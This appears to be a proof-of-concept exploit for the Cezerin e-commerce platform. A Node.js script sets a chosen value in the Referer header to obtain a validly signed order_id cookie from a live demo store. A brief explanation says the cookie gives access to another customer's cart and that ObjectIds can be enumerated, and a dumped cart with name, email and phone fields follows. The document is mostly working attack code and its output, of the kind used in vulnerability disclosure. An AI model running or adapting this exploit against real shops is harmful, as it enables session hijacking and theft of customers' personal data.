const axios = require("axios");
// 62b9728e9352df6441630054
let config = {
headers: {
'Host': 'plusha.cezerin.net',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': process.argv[2],
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
};
(async () => {
await axios.get('https://plusha.cezerin.net/', config)
.then(data => console.log(`success : order_id=${data.headers['set-cookie'][0].split('=')[1].split(';')[0]}` ));
})();
success : order_id=s%3A62b9728e9352df6441630054.x%2FwysOvDVq9nNwXO4N3tFmZpki7lvEHMgqtNAkAoTuw
Now that we have a valid signed order_id cookie, if we import that cookie in the browser , we will get access to the customers cart , with all its details and you can also perform an attack on the objectId , listing carts that contain customer data ;
{
"date_created":"2022-06-27T09:04:14.558Z",
"date_placed":null,
"date_updated":"2022-06-27T09:05:31.311Z",
"date_closed":null,
"date_paid":null,
"date_cancelled":null,
"number":1002,
"shipping_status":"",
"items":[
{
"product_image":[
{
"id":"5e1653f2f60c02051954ed72",
"alt":"",
"position":99,
"filename":"cezerin.png",
"url":"https://cezerin.net/images/products/5e1639ae0c86ec14224a4645/cezerin.png"
}
],
"id":"62b9728e9352df6441630055",
"product_id":"5e1639ae0c86ec14224a4645",
"variant_id":null,
"quantity":2,
"discount_total":0,
"name":"Product A",
"price":850,
"price_total":1700,
"sku":"product-a",
"tax_class":null,
"tax_total":0,
"variant_name":"",
"weight":0.5,
"image_url":"https://cezerin.net/images/products/5e1639ae0c86ec14224a4645/cezerin.png",
"path":"/category-a/product-a",
"stock_quantity":10000
}
],
"transactions":[
],
"discounts":[
],
"billing_address":{
"full_name":"",
"address1":"",
"address2":"",
"city":"",
"country":"",
"postal_code":"",
"state":"",
"phone":"",
"company":"",
"tax_number":"",
"coordinates":{
"latitude":"",
"longitude":""
},
"details":null
},
"shipping_address":{
"full_name":"backer 68 ",
"address1":"",
"address2":"",
"city":"",
"country":"",
"postal_code":"",
"state":"",
"phone":"",
"company":"",
"tax_number":"",
"coordinates":{
"latitude":"",
"longitude":""
},
"details":null
},
"tax_rate":0,
"shipping_tax":0,
"shipping_discount":0,
"shipping_price":0,
"item_tax_included":true,
"shipping_tax_included":true,
"closed":false,
"cancelled":false,
"delivered":false,
"paid":false,
"hold":false,
"draft":true,
"first_name":"backer 68",
"last_name":"",
"password":"",
"email":"[email protected]",
"mobile":"+5 (555) 555-5555",
"referrer_url":"https://cezerin.org/",
"landing_url":"https://plusha.cezerin.net/",
"channel":"",
"note":"",
"comments":"",
"coupon":"",
"tracking_number":"",
"customer_id":null,
"status_id":null,
"payment_method_id":null,
"shipping_method_id":"5e1639ae0c86ec14224a464e",
"tags":[
],
"id":"62b9728e9352df6441630054",
"status":"",
"shipping_method":"Courier",
"payment_method":"",
"payment_method_gateway":"",
"weight_total":1,
"discount_total":0,
"subtotal":1700,
"tax_included_total":0,
"tax_total":0,
"shipping_total":0,
"grand_total":1700
}